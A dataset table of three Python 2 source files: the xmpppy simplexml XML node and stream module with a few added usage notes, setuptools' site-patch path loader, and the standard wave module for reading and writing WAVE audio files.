repo_name | path | copies | size | content | license
|---|---|---|---|---|---|
yqm/sl4a | python-build/python-libs/xmpppy/xmpp/simplexml.py | 198 | 22791 | ## simplexml.py based on Matthew Allum's xmlstream.py
##
## Copyright (C) 2003-2005 Alexey "Snake" Nezhdanov
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2, or (at your option)
## any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
# $Id: simplexml.py,v 1.34 2009/03/03 10:24:02 normanr Exp $
"""Simplexml module provides xmpppy library with all needed tools to handle XML nodes and XML streams.
I'm personally using it in many other separate projects. It is designed to be as standalone as possible."""
import xml.parsers.expat
def XMLescape(txt):
"""Returns provided string with symbols & < > " replaced by their respective XML entities."""
# replace also FORM FEED and ESC, because they are not valid XML chars
return txt.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;").replace('"', "&quot;").replace(u'\x0C', "").replace(u'\x1B', "")
ENCODING='utf-8'
def ustr(what):
"""Converts object "what" to unicode string using it's own __str__ method if accessible or unicode method otherwise."""
if isinstance(what, unicode): return what
try: r=what.__str__()
except AttributeError: r=str(what)
if not isinstance(r, unicode): return unicode(r,ENCODING)
return r
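# Editor's note (illustrative example, not part of the original module):
#   XMLescape(u'a < "b" & c') -> u'a &lt; &quot;b&quot; &amp; c'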
class Node(object):
""" Node class describes syntax of separate XML Node. It have a constructor that permits node creation
from set of "namespace name", attributes and payload of text strings and other nodes.
It does not natively support building node from text string and uses NodeBuilder class for that purpose.
After creation node can be mangled in many ways so it can be completely changed.
Also node can be serialised into string in one of two modes: default (where the textual representation
of node describes it exactly) and "fancy" - with whitespace added to make indentation and thus make
result more readable by human.
Node class have attribute FORCE_NODE_RECREATION that is defaults to False thus enabling fast node
replication from the some other node. The drawback of the fast way is that new node shares some
info with the "original" node that is changing the one node may influence the other. Though it is
rarely needed (in xmpppy it is never needed at all since I'm usually never using original node after
replication (and using replication only to move upwards on the classes tree).
"""
FORCE_NODE_RECREATION=0
def __init__(self, tag=None, attrs={}, payload=[], parent=None, nsp=None, node_built=False, node=None):
""" Takes "tag" argument as the name of node (prepended by namespace, if needed and separated from it
by a space), attrs dictionary as the set of arguments, payload list as the set of textual strings
and child nodes that this node carries within itself and "parent" argument that is another node
that this one will be the child of. Also the __init__ can be provided with "node" argument that is
either a text string containing exactly one node or another Node instance to begin with. If both
"node" and other arguments is provided then the node initially created as replica of "node"
provided and then modified to be compliant with other arguments."""
if node:
if self.FORCE_NODE_RECREATION and isinstance(node, Node):
node=str(node)
if not isinstance(node, Node):
node=NodeBuilder(node,self)
node_built = True
else:
self.name,self.namespace,self.attrs,self.data,self.kids,self.parent,self.nsd = node.name,node.namespace,{},[],[],node.parent,{}
for key in node.attrs.keys(): self.attrs[key]=node.attrs[key]
for data in node.data: self.data.append(data)
for kid in node.kids: self.kids.append(kid)
for k,v in node.nsd.items(): self.nsd[k] = v
else: self.name,self.namespace,self.attrs,self.data,self.kids,self.parent,self.nsd = 'tag','',{},[],[],None,{}
if parent:
self.parent = parent
self.nsp_cache = {}
if nsp:
for k,v in nsp.items(): self.nsp_cache[k] = v
for attr,val in attrs.items():
if attr == 'xmlns':
self.nsd[u''] = val
elif attr.startswith('xmlns:'):
self.nsd[attr[6:]] = val
self.attrs[attr]=attrs[attr]
if tag:
if node_built:
pfx,self.name = (['']+tag.split(':'))[-2:]
self.namespace = self.lookup_nsp(pfx)
else:
if ' ' in tag:
self.namespace,self.name = tag.split()
else:
self.name = tag
if isinstance(payload, basestring): payload=[payload]
for i in payload:
if isinstance(i, Node): self.addChild(node=i)
else: self.data.append(ustr(i))
def lookup_nsp(self,pfx=''):
ns = self.nsd.get(pfx,None)
if ns is None:
ns = self.nsp_cache.get(pfx,None)
if ns is None:
if self.parent:
ns = self.parent.lookup_nsp(pfx)
self.nsp_cache[pfx] = ns
else:
return 'http://www.gajim.org/xmlns/undeclared'
return ns
def __str__(self,fancy=0):
""" Method used to dump node into textual representation.
if "fancy" argument is set to True produces indented output for readability."""
s = (fancy-1) * 2 * ' ' + "<" + self.name
if self.namespace:
if not self.parent or self.parent.namespace!=self.namespace:
if 'xmlns' not in self.attrs:
s = s + ' xmlns="%s"'%self.namespace
for key in self.attrs.keys():
val = ustr(self.attrs[key])
s = s + ' %s="%s"' % ( key, XMLescape(val) )
s = s + ">"
cnt = 0
if self.kids:
if fancy: s = s + "\n"
for a in self.kids:
if not fancy and (len(self.data)-1)>=cnt: s=s+XMLescape(self.data[cnt])
elif (len(self.data)-1)>=cnt: s=s+XMLescape(self.data[cnt].strip())
if isinstance(a, Node):
s = s + a.__str__(fancy and fancy+1)
elif a:
s = s + a.__str__()
cnt=cnt+1
if not fancy and (len(self.data)-1) >= cnt: s = s + XMLescape(self.data[cnt])
elif (len(self.data)-1) >= cnt: s = s + XMLescape(self.data[cnt].strip())
if not self.kids and s.endswith('>'):
s=s[:-1]+' />'
if fancy: s = s + "\n"
else:
if fancy and not self.data: s = s + (fancy-1) * 2 * ' '
s = s + "</" + self.name + ">"
if fancy: s = s + "\n"
return s
def getCDATA(self):
""" Serialise node, dropping all tags and leaving CDATA intact.
That is effectively kills all formatiing, leaving only text were contained in XML.
"""
s = ""
cnt = 0
if self.kids:
for a in self.kids:
s=s+self.data[cnt]
if a: s = s + a.getCDATA()
cnt=cnt+1
if (len(self.data)-1) >= cnt: s = s + self.data[cnt]
return s
def addChild(self, name=None, attrs={}, payload=[], namespace=None, node=None):
""" If "node" argument is provided, adds it as child node. Else creates new node from
the other arguments' values and adds it as well."""
if 'xmlns' in attrs:
raise AttributeError("Use namespace=x instead of attrs={'xmlns':x}")
if node:
newnode=node
node.parent = self
else: newnode=Node(tag=name, parent=self, attrs=attrs, payload=payload)
if namespace:
newnode.setNamespace(namespace)
self.kids.append(newnode)
self.data.append(u'')
return newnode
def addData(self, data):
""" Adds some CDATA to node. """
self.data.append(ustr(data))
self.kids.append(None)
def clearData(self):
""" Removes all CDATA from the node. """
self.data=[]
def delAttr(self, key):
""" Deletes an attribute "key" """
del self.attrs[key]
def delChild(self, node, attrs={}):
""" Deletes the "node" from the node's childs list, if "node" is an instance.
Else deletes the first node that have specified name and (optionally) attributes. """
if not isinstance(node, Node): node=self.getTag(node,attrs)
self.kids[self.kids.index(node)]=None
return node
def getAttrs(self):
""" Returns all node's attributes as dictionary. """
return self.attrs
def getAttr(self, key):
""" Returns value of specified attribute. """
try: return self.attrs[key]
except: return None
def getChildren(self):
""" Returns all node's child nodes as list. """
return self.kids
def getData(self):
""" Returns all node CDATA as string (concatenated). """
return ''.join(self.data)
def getName(self):
""" Returns the name of node """
return self.name
def getNamespace(self):
""" Returns the namespace of node """
return self.namespace
def getParent(self):
""" Returns the parent of node (if present). """
return self.parent
def getPayload(self):
""" Return the payload of node i.e. list of child nodes and CDATA entries.
F.e. for "<node>text1<nodea/><nodeb/> text2</node>" will be returned list:
['text1', <nodea instance>, <nodeb instance>, ' text2']. """
ret=[]
for i in range(max(len(self.data),len(self.kids))):
if i < len(self.data) and self.data[i]: ret.append(self.data[i])
if i < len(self.kids) and self.kids[i]: ret.append(self.kids[i])
return ret
def getTag(self, name, attrs={}, namespace=None):
""" Filters all child nodes using specified arguments as filter.
Returns the first found or None if not found. """
return self.getTags(name, attrs, namespace, one=1)
def getTagAttr(self,tag,attr):
""" Returns attribute value of the child with specified name (or None if no such attribute)."""
try: return self.getTag(tag).attrs[attr]
except: return None
def getTagData(self,tag):
""" Returns cocatenated CDATA of the child with specified name."""
try: return self.getTag(tag).getData()
except: return None
def getTags(self, name, attrs={}, namespace=None, one=0):
""" Filters all child nodes using specified arguments as filter.
Returns the list of nodes found. """
nodes=[]
for node in self.kids:
if not node: continue
if namespace and namespace!=node.getNamespace(): continue
if node.getName() == name:
for key in attrs.keys():
if key not in node.attrs or node.attrs[key]!=attrs[key]: break
else: nodes.append(node)
if one and nodes: return nodes[0]
if not one: return nodes
def iterTags(self, name, attrs={}, namespace=None):
""" Iterate over all children using specified arguments as filter. """
for node in self.kids:
if not node: continue
if namespace is not None and namespace!=node.getNamespace(): continue
if node.getName() == name:
for key in attrs.keys():
if key not in node.attrs or \
node.attrs[key]!=attrs[key]: break
else:
yield node
def setAttr(self, key, val):
""" Sets attribute "key" with the value "val". """
self.attrs[key]=val
def setData(self, data):
""" Sets node's CDATA to provided string. Resets all previous CDATA!"""
self.data=[ustr(data)]
def setName(self,val):
""" Changes the node name. """
self.name = val
def setNamespace(self, namespace):
""" Changes the node namespace. """
self.namespace=namespace
def setParent(self, node):
""" Sets node's parent to "node". WARNING: do not checks if the parent already present
and not removes the node from the list of childs of previous parent. """
self.parent = node
def setPayload(self,payload,add=0):
""" Sets node payload according to the list specified. WARNING: completely replaces all node's
previous content. If you wish just to add child or CDATA - use addData or addChild methods. """
if isinstance(payload, basestring): payload=[payload]
if add: self.kids+=payload
else: self.kids=payload
def setTag(self, name, attrs={}, namespace=None):
""" Same as getTag but if the node with specified namespace/attributes not found, creates such
node and returns it. """
node=self.getTags(name, attrs, namespace=namespace, one=1)
if node: return node
else: return self.addChild(name, attrs, namespace=namespace)
def setTagAttr(self,tag,attr,val):
""" Creates new node (if not already present) with name "tag"
and sets it's attribute "attr" to value "val". """
try: self.getTag(tag).attrs[attr]=val
except: self.addChild(tag,attrs={attr:val})
def setTagData(self,tag,val,attrs={}):
""" Creates new node (if not already present) with name "tag" and (optionally) attributes "attrs"
and sets it's CDATA to string "val". """
try: self.getTag(tag,attrs).setData(ustr(val))
except: self.addChild(tag,attrs,payload=[ustr(val)])
def has_attr(self,key):
""" Checks if node have attribute "key"."""
return key in self.attrs
def __getitem__(self,item):
""" Returns node's attribute "item" value. """
return self.getAttr(item)
def __setitem__(self,item,val):
""" Sets node's attribute "item" value. """
return self.setAttr(item,val)
def __delitem__(self,item):
""" Deletes node's attribute "item". """
return self.delAttr(item)
def __getattr__(self,attr):
""" Reduce memory usage caused by T/NT classes - use memory only when needed. """
if attr=='T':
self.T=T(self)
return self.T
if attr=='NT':
self.NT=NT(self)
return self.NT
raise AttributeError
class T:
""" Auxiliary class used to quick access to node's child nodes. """
def __init__(self,node): self.__dict__['node']=node
def __getattr__(self,attr): return self.node.getTag(attr)
def __setattr__(self,attr,val):
if isinstance(val,Node): Node.__init__(self.node.setTag(attr),node=val)
else: return self.node.setTagData(attr,val)
def __delattr__(self,attr): return self.node.delChild(attr)
class NT(T):
""" Auxiliary class used to quick create node's child nodes. """
def __getattr__(self,attr): return self.node.addChild(attr)
def __setattr__(self,attr,val):
if isinstance(val,Node): self.node.addChild(attr,node=val)
else: return self.node.addChild(attr,payload=[val])
DBG_NODEBUILDER = 'nodebuilder'
class NodeBuilder:
""" Builds a Node class minidom from data parsed to it. This class used for two purposes:
1. Creation an XML Node from a textual representation. F.e. reading a config file. See an XML2Node method.
2. Handling an incoming XML stream. This is done by mangling
the __dispatch_depth parameter and redefining the dispatch method.
You do not need to use this class directly if you do not designing your own XML handler."""
def __init__(self,data=None,initial_node=None):
""" Takes two optional parameters: "data" and "initial_node".
By default class initialised with empty Node class instance.
Though, if "initial_node" is provided it used as "starting point".
You can think about it as of "node upgrade".
"data" (if provided) feeded to parser immidiatedly after instance init.
"""
self.DEBUG(DBG_NODEBUILDER, "Preparing to handle incoming XML stream.", 'start')
self._parser = xml.parsers.expat.ParserCreate()
self._parser.StartElementHandler = self.starttag
self._parser.EndElementHandler = self.endtag
self._parser.CharacterDataHandler = self.handle_cdata
self._parser.StartNamespaceDeclHandler = self.handle_namespace_start
self._parser.buffer_text = True
self.Parse = self._parser.Parse
self.__depth = 0
self.__last_depth = 0
self.__max_depth = 0
self._dispatch_depth = 1
self._document_attrs = None
self._document_nsp = None
self._mini_dom=initial_node
self.last_is_data = 1
self._ptr=None
self.data_buffer = None
self.streamError = ''
if data:
self._parser.Parse(data,1)
def check_data_buffer(self):
if self.data_buffer:
self._ptr.data.append(''.join(self.data_buffer))
del self.data_buffer[:]
self.data_buffer = None
def destroy(self):
""" Method used to allow class instance to be garbage-collected. """
self.check_data_buffer()
self._parser.StartElementHandler = None
self._parser.EndElementHandler = None
self._parser.CharacterDataHandler = None
self._parser.StartNamespaceDeclHandler = None
def starttag(self, tag, attrs):
"""XML Parser callback. Used internally"""
self.check_data_buffer()
self._inc_depth()
self.DEBUG(DBG_NODEBUILDER, "DEPTH -> %i , tag -> %s, attrs -> %s" % (self.__depth, tag, `attrs`), 'down')
if self.__depth == self._dispatch_depth:
if not self._mini_dom :
self._mini_dom = Node(tag=tag, attrs=attrs, nsp = self._document_nsp, node_built=True)
else:
Node.__init__(self._mini_dom,tag=tag, attrs=attrs, nsp = self._document_nsp, node_built=True)
self._ptr = self._mini_dom
elif self.__depth > self._dispatch_depth:
self._ptr.kids.append(Node(tag=tag,parent=self._ptr,attrs=attrs, node_built=True))
self._ptr = self._ptr.kids[-1]
if self.__depth == 1:
self._document_attrs = {}
self._document_nsp = {}
nsp, name = (['']+tag.split(':'))[-2:]
for attr,val in attrs.items():
if attr == 'xmlns':
self._document_nsp[u''] = val
elif attr.startswith('xmlns:'):
self._document_nsp[attr[6:]] = val
else:
self._document_attrs[attr] = val
ns = self._document_nsp.get(nsp, 'http://www.gajim.org/xmlns/undeclared-root')
try:
self.stream_header_received(ns, name, attrs)
except ValueError, e:
self._document_attrs = None
raise ValueError(str(e))
if not self.last_is_data and self._ptr.parent:
self._ptr.parent.data.append('')
self.last_is_data = 0
def endtag(self, tag ):
"""XML Parser callback. Used internally"""
self.DEBUG(DBG_NODEBUILDER, "DEPTH -> %i , tag -> %s" % (self.__depth, tag), 'up')
self.check_data_buffer()
if self.__depth == self._dispatch_depth:
if self._mini_dom.getName() == 'error':
self.streamError = self._mini_dom.getChildren()[0].getName()
self.dispatch(self._mini_dom)
elif self.__depth > self._dispatch_depth:
self._ptr = self._ptr.parent
else:
self.DEBUG(DBG_NODEBUILDER, "Got higher than dispatch level. Stream terminated?", 'stop')
self._dec_depth()
self.last_is_data = 0
if self.__depth == 0: self.stream_footer_received()
def handle_cdata(self, data):
"""XML Parser callback. Used internally"""
self.DEBUG(DBG_NODEBUILDER, data, 'data')
if self.last_is_data:
if self.data_buffer:
self.data_buffer.append(data)
elif self._ptr:
self.data_buffer = [data]
self.last_is_data = 1
def handle_namespace_start(self, prefix, uri):
"""XML Parser callback. Used internally"""
self.check_data_buffer()
def DEBUG(self, level, text, comment=None):
""" Gets all NodeBuilder walking events. Can be used for debugging if redefined."""
def getDom(self):
""" Returns just built Node. """
self.check_data_buffer()
return self._mini_dom
def dispatch(self,stanza):
""" Gets called when the NodeBuilder reaches some level of depth on it's way up with the built
node as argument. Can be redefined to convert incoming XML stanzas to program events. """
def stream_header_received(self,ns,tag,attrs):
""" Method called when stream just opened. """
self.check_data_buffer()
def stream_footer_received(self):
""" Method called when stream just closed. """
self.check_data_buffer()
def has_received_endtag(self, level=0):
""" Return True if at least one end tag was seen (at level) """
return self.__depth <= level and self.__max_depth > level
def _inc_depth(self):
self.__last_depth = self.__depth
self.__depth += 1
self.__max_depth = max(self.__depth, self.__max_depth)
def _dec_depth(self):
self.__last_depth = self.__depth
self.__depth -= 1
def XML2Node(xml):
""" Converts supplied textual string into XML node. Handy f.e. for reading configuration file.
Raises xml.parser.expat.parsererror if provided string is not well-formed XML. """
return NodeBuilder(xml).getDom()
def BadXML2Node(xml):
""" Converts supplied textual string into XML node. Survives if xml data is cutted half way round.
I.e. "<html>some text <br>some more text". Will raise xml.parser.expat.parsererror on misplaced
tags though. F.e. "<b>some text <br>some more text</b>" will not work."""
return NodeBuilder(xml).getDom()
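# --- Editor's sketch (hypothetical tag/attribute values, not part of the ---
# --- original module): a minimal round trip using the API defined above.  ---
if __name__ == '__main__':
    # Build a node by hand and serialise it.
    n = Node('message', attrs={'type': 'chat'}, payload=['hello '])
    n.addChild('body', payload=['hi there'])
    print str(n)   # -> <message type="chat">hello <body>hi there</body></message>
    # Parse a textual representation back into a Node tree.
    m = XML2Node('<a x="1"><b>txt</b></a>')
    print m.getTagData('b')        # -> txt
    print m.getTagAttr('b', 'x')   # -> None (the attribute lives on <a>, not <b>)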
| apache-2.0 |
tuxfux-hlp-notes/python-batches | archieves/batch-56/modules/sheets/lib/python2.7/site-packages/setuptools/site-patch.py | 358 | 2418 | def __boot():
import sys, os, os.path
PYTHONPATH = os.environ.get('PYTHONPATH')
if PYTHONPATH is None or (sys.platform=='win32' and not PYTHONPATH):
PYTHONPATH = []
else:
PYTHONPATH = PYTHONPATH.split(os.pathsep)
pic = getattr(sys,'path_importer_cache',{})
stdpath = sys.path[len(PYTHONPATH):]
mydir = os.path.dirname(__file__)
#print "searching",stdpath,sys.path
for item in stdpath:
if item==mydir or not item:
continue # skip if current dir. on Windows, or my own directory
importer = pic.get(item)
if importer is not None:
loader = importer.find_module('site')
if loader is not None:
# This should actually reload the current module
loader.load_module('site')
break
else:
try:
import imp # Avoid import loop in Python >= 3.3
stream, path, descr = imp.find_module('site',[item])
except ImportError:
continue
if stream is None:
continue
try:
# This should actually reload the current module
imp.load_module('site',stream,path,descr)
finally:
stream.close()
break
else:
raise ImportError("Couldn't find the real 'site' module")
#print "loaded", __file__
known_paths = dict([(makepath(item)[1],1) for item in sys.path]) # 2.2 comp
oldpos = getattr(sys,'__egginsert',0) # save old insertion position
sys.__egginsert = 0 # and reset the current one
for item in PYTHONPATH:
addsitedir(item)
sys.__egginsert += oldpos # restore effective old position
d,nd = makepath(stdpath[0])
insert_at = None
new_path = []
for item in sys.path:
p,np = makepath(item)
if np==nd and insert_at is None:
# We've hit the first 'system' path entry, so added entries go here
insert_at = len(new_path)
if np in known_paths or insert_at is None:
new_path.append(item)
else:
# new path after the insert point, back-insert it
new_path.insert(insert_at, item)
insert_at += 1
sys.path[:] = new_path
if __name__=='site':
__boot()
del __boot
| gpl-3.0 |
kenshay/ImageScript | ProgramData/SystemFiles/Python/Lib/wave.py | 11 | 18582 | """Stuff to parse WAVE files.
Usage.
Reading WAVE files:
f = wave.open(file, 'r')
where file is either the name of a file or an open file pointer.
The open file pointer must have methods read(), seek(), and close().
When the setpos() and rewind() methods are not used, the seek()
method is not necessary.
This returns an instance of a class with the following public methods:
getnchannels() -- returns number of audio channels (1 for
mono, 2 for stereo)
getsampwidth() -- returns sample width in bytes
getframerate() -- returns sampling frequency
getnframes() -- returns number of audio frames
getcomptype() -- returns compression type ('NONE' for linear samples)
getcompname() -- returns human-readable version of
compression type ('not compressed' linear samples)
getparams() -- returns a tuple consisting of all of the
above in the above order
getmarkers() -- returns None (for compatibility with the
aifc module)
getmark(id) -- raises an error since the mark does not
exist (for compatibility with the aifc module)
readframes(n) -- returns at most n frames of audio
rewind() -- rewind to the beginning of the audio stream
setpos(pos) -- seek to the specified position
tell() -- return the current position
close() -- close the instance (make it unusable)
The position returned by tell() and the position given to setpos()
are compatible and have nothing to do with the actual position in the
file.
The close() method is called automatically when the class instance
is destroyed.
Writing WAVE files:
f = wave.open(file, 'w')
where file is either the name of a file or an open file pointer.
The open file pointer must have methods write(), tell(), seek(), and
close().
This returns an instance of a class with the following public methods:
setnchannels(n) -- set the number of channels
setsampwidth(n) -- set the sample width
setframerate(n) -- set the frame rate
setnframes(n) -- set the number of frames
setcomptype(type, name)
-- set the compression type and the
human-readable compression type
setparams(tuple)
-- set all parameters at once
tell() -- return current position in output file
writeframesraw(data)
-- write audio frames without patching up the
file header
writeframes(data)
-- write audio frames and patch up the file header
close() -- patch up the file header and close the
output file
You should set the parameters before the first writeframesraw or
writeframes. The total number of frames does not need to be set,
but when it is set to the correct value, the header does not have to
be patched up.
It is best to first set all parameters, possibly including the
compression type, and then write audio frames using writeframesraw.
When all frames have been written, either call writeframes('') or
close() to patch up the sizes in the header.
The close() method is called automatically when the class instance
is destroyed.
"""
import __builtin__
__all__ = ["open", "openfp", "Error"]
class Error(Exception):
pass
WAVE_FORMAT_PCM = 0x0001
_array_fmts = None, 'b', 'h', None, 'i'
import struct
import sys
from chunk import Chunk
def _byteswap3(data):
ba = bytearray(data)
ba[::3] = data[2::3]
ba[2::3] = data[::3]
return bytes(ba)
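# Editor's note (illustrative example, not part of the original module):
#   _byteswap3('\x01\x02\x03\x04\x05\x06') -> '\x03\x02\x01\x06\x05\x04'
# i.e. each 3-byte (24-bit) sample has its byte order reversed in place.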
class Wave_read:
"""Variables used in this class:
These variables are available to the user through appropriate
methods of this class:
_file -- the open file with methods read(), close(), and seek()
set through the __init__() method
_nchannels -- the number of audio channels
available through the getnchannels() method
_nframes -- the number of audio frames
available through the getnframes() method
_sampwidth -- the number of bytes per audio sample
available through the getsampwidth() method
_framerate -- the sampling frequency
available through the getframerate() method
_comptype -- the AIFF-C compression type ('NONE' if AIFF)
available through the getcomptype() method
_compname -- the human-readable AIFF-C compression type
available through the getcompname() method
_soundpos -- the position in the audio stream
available through the tell() method, set through the
setpos() method
These variables are used internally only:
_fmt_chunk_read -- 1 iff the FMT chunk has been read
_data_seek_needed -- 1 iff positioned correctly in audio
file for readframes()
_data_chunk -- instantiation of a chunk class for the DATA chunk
_framesize -- size of one frame in the file
"""
def initfp(self, file):
self._convert = None
self._soundpos = 0
self._file = Chunk(file, bigendian = 0)
if self._file.getname() != 'RIFF':
raise Error, 'file does not start with RIFF id'
if self._file.read(4) != 'WAVE':
raise Error, 'not a WAVE file'
self._fmt_chunk_read = 0
self._data_chunk = None
while 1:
self._data_seek_needed = 1
try:
chunk = Chunk(self._file, bigendian = 0)
except EOFError:
break
chunkname = chunk.getname()
if chunkname == 'fmt ':
self._read_fmt_chunk(chunk)
self._fmt_chunk_read = 1
elif chunkname == 'data':
if not self._fmt_chunk_read:
raise Error, 'data chunk before fmt chunk'
self._data_chunk = chunk
self._nframes = chunk.chunksize // self._framesize
self._data_seek_needed = 0
break
chunk.skip()
if not self._fmt_chunk_read or not self._data_chunk:
raise Error, 'fmt chunk and/or data chunk missing'
def __init__(self, f):
self._i_opened_the_file = None
if isinstance(f, basestring):
f = __builtin__.open(f, 'rb')
self._i_opened_the_file = f
# else, assume it is an open file object already
try:
self.initfp(f)
except:
if self._i_opened_the_file:
f.close()
raise
def __del__(self):
self.close()
#
# User visible methods.
#
def getfp(self):
return self._file
def rewind(self):
self._data_seek_needed = 1
self._soundpos = 0
def close(self):
self._file = None
file = self._i_opened_the_file
if file:
self._i_opened_the_file = None
file.close()
def tell(self):
return self._soundpos
def getnchannels(self):
return self._nchannels
def getnframes(self):
return self._nframes
def getsampwidth(self):
return self._sampwidth
def getframerate(self):
return self._framerate
def getcomptype(self):
return self._comptype
def getcompname(self):
return self._compname
def getparams(self):
return self.getnchannels(), self.getsampwidth(), \
self.getframerate(), self.getnframes(), \
self.getcomptype(), self.getcompname()
def getmarkers(self):
return None
def getmark(self, id):
raise Error, 'no marks'
def setpos(self, pos):
if pos < 0 or pos > self._nframes:
raise Error, 'position not in range'
self._soundpos = pos
self._data_seek_needed = 1
def readframes(self, nframes):
if self._data_seek_needed:
self._data_chunk.seek(0, 0)
pos = self._soundpos * self._framesize
if pos:
self._data_chunk.seek(pos, 0)
self._data_seek_needed = 0
if nframes == 0:
return ''
if self._sampwidth in (2, 4) and sys.byteorder == 'big':
# unfortunately the fromfile() method does not take
# something that only looks like a file object, so
# we have to reach into the innards of the chunk object
import array
chunk = self._data_chunk
data = array.array(_array_fmts[self._sampwidth])
assert data.itemsize == self._sampwidth
nitems = nframes * self._nchannels
if nitems * self._sampwidth > chunk.chunksize - chunk.size_read:
nitems = (chunk.chunksize - chunk.size_read) // self._sampwidth
data.fromfile(chunk.file.file, nitems)
# "tell" data chunk how much was read
chunk.size_read = chunk.size_read + nitems * self._sampwidth
# do the same for the outermost chunk
chunk = chunk.file
chunk.size_read = chunk.size_read + nitems * self._sampwidth
data.byteswap()
data = data.tostring()
else:
data = self._data_chunk.read(nframes * self._framesize)
if self._sampwidth == 3 and sys.byteorder == 'big':
data = _byteswap3(data)
if self._convert and data:
data = self._convert(data)
self._soundpos = self._soundpos + len(data) // (self._nchannels * self._sampwidth)
return data
#
# Internal methods.
#
def _read_fmt_chunk(self, chunk):
wFormatTag, self._nchannels, self._framerate, dwAvgBytesPerSec, wBlockAlign = struct.unpack('<HHLLH', chunk.read(14))
if wFormatTag == WAVE_FORMAT_PCM:
sampwidth = struct.unpack('<H', chunk.read(2))[0]
self._sampwidth = (sampwidth + 7) // 8
else:
raise Error, 'unknown format: %r' % (wFormatTag,)
self._framesize = self._nchannels * self._sampwidth
self._comptype = 'NONE'
self._compname = 'not compressed'
class Wave_write:
"""Variables used in this class:
These variables are user settable through appropriate methods
of this class:
_file -- the open file with methods write(), close(), tell(), seek()
set through the __init__() method
_comptype -- the AIFF-C compression type ('NONE' in AIFF)
set through the setcomptype() or setparams() method
_compname -- the human-readable AIFF-C compression type
set through the setcomptype() or setparams() method
_nchannels -- the number of audio channels
set through the setnchannels() or setparams() method
_sampwidth -- the number of bytes per audio sample
set through the setsampwidth() or setparams() method
_framerate -- the sampling frequency
set through the setframerate() or setparams() method
_nframes -- the number of audio frames written to the header
set through the setnframes() or setparams() method
These variables are used internally only:
_datalength -- the size of the audio samples written to the header
_nframeswritten -- the number of frames actually written
_datawritten -- the size of the audio samples actually written
"""
def __init__(self, f):
self._i_opened_the_file = None
if isinstance(f, basestring):
f = __builtin__.open(f, 'wb')
self._i_opened_the_file = f
try:
self.initfp(f)
except:
if self._i_opened_the_file:
f.close()
raise
def initfp(self, file):
self._file = file
self._convert = None
self._nchannels = 0
self._sampwidth = 0
self._framerate = 0
self._nframes = 0
self._nframeswritten = 0
self._datawritten = 0
self._datalength = 0
self._headerwritten = False
def __del__(self):
self.close()
#
# User visible methods.
#
def setnchannels(self, nchannels):
if self._datawritten:
raise Error, 'cannot change parameters after starting to write'
if nchannels < 1:
raise Error, 'bad # of channels'
self._nchannels = nchannels
def getnchannels(self):
if not self._nchannels:
raise Error, 'number of channels not set'
return self._nchannels
def setsampwidth(self, sampwidth):
if self._datawritten:
raise Error, 'cannot change parameters after starting to write'
if sampwidth < 1 or sampwidth > 4:
raise Error, 'bad sample width'
self._sampwidth = sampwidth
def getsampwidth(self):
if not self._sampwidth:
raise Error, 'sample width not set'
return self._sampwidth
def setframerate(self, framerate):
if self._datawritten:
raise Error, 'cannot change parameters after starting to write'
if framerate <= 0:
raise Error, 'bad frame rate'
self._framerate = framerate
def getframerate(self):
if not self._framerate:
raise Error, 'frame rate not set'
return self._framerate
def setnframes(self, nframes):
if self._datawritten:
raise Error, 'cannot change parameters after starting to write'
self._nframes = nframes
def getnframes(self):
return self._nframeswritten
def setcomptype(self, comptype, compname):
if self._datawritten:
raise Error, 'cannot change parameters after starting to write'
if comptype not in ('NONE',):
raise Error, 'unsupported compression type'
self._comptype = comptype
self._compname = compname
def getcomptype(self):
return self._comptype
def getcompname(self):
return self._compname
def setparams(self, params):
nchannels, sampwidth, framerate, nframes, comptype, compname = params
if self._datawritten:
raise Error, 'cannot change parameters after starting to write'
self.setnchannels(nchannels)
self.setsampwidth(sampwidth)
self.setframerate(framerate)
self.setnframes(nframes)
self.setcomptype(comptype, compname)
def getparams(self):
if not self._nchannels or not self._sampwidth or not self._framerate:
raise Error, 'not all parameters set'
return self._nchannels, self._sampwidth, self._framerate, \
self._nframes, self._comptype, self._compname
def setmark(self, id, pos, name):
raise Error, 'setmark() not supported'
def getmark(self, id):
raise Error, 'no marks'
def getmarkers(self):
return None
def tell(self):
return self._nframeswritten
def writeframesraw(self, data):
self._ensure_header_written(len(data))
nframes = len(data) // (self._sampwidth * self._nchannels)
if self._convert:
data = self._convert(data)
if self._sampwidth in (2, 4) and sys.byteorder == 'big':
import array
a = array.array(_array_fmts[self._sampwidth])
a.fromstring(data)
data = a
assert data.itemsize == self._sampwidth
data.byteswap()
data.tofile(self._file)
self._datawritten = self._datawritten + len(data) * self._sampwidth
else:
if self._sampwidth == 3 and sys.byteorder == 'big':
data = _byteswap3(data)
self._file.write(data)
self._datawritten = self._datawritten + len(data)
self._nframeswritten = self._nframeswritten + nframes
def writeframes(self, data):
self.writeframesraw(data)
if self._datalength != self._datawritten:
self._patchheader()
def close(self):
try:
if self._file:
self._ensure_header_written(0)
if self._datalength != self._datawritten:
self._patchheader()
self._file.flush()
finally:
self._file = None
file = self._i_opened_the_file
if file:
self._i_opened_the_file = None
file.close()
#
# Internal methods.
#
def _ensure_header_written(self, datasize):
if not self._headerwritten:
if not self._nchannels:
raise Error, '# channels not specified'
if not self._sampwidth:
raise Error, 'sample width not specified'
if not self._framerate:
raise Error, 'sampling rate not specified'
self._write_header(datasize)
def _write_header(self, initlength):
assert not self._headerwritten
self._file.write('RIFF')
if not self._nframes:
self._nframes = initlength / (self._nchannels * self._sampwidth)
self._datalength = self._nframes * self._nchannels * self._sampwidth
self._form_length_pos = self._file.tell()
self._file.write(struct.pack('<L4s4sLHHLLHH4s',
36 + self._datalength, 'WAVE', 'fmt ', 16,
WAVE_FORMAT_PCM, self._nchannels, self._framerate,
self._nchannels * self._framerate * self._sampwidth,
self._nchannels * self._sampwidth,
self._sampwidth * 8, 'data'))
self._data_length_pos = self._file.tell()
self._file.write(struct.pack('<L', self._datalength))
self._headerwritten = True
def _patchheader(self):
assert self._headerwritten
if self._datawritten == self._datalength:
return
curpos = self._file.tell()
self._file.seek(self._form_length_pos, 0)
self._file.write(struct.pack('<L', 36 + self._datawritten))
self._file.seek(self._data_length_pos, 0)
self._file.write(struct.pack('<L', self._datawritten))
self._file.seek(curpos, 0)
self._datalength = self._datawritten
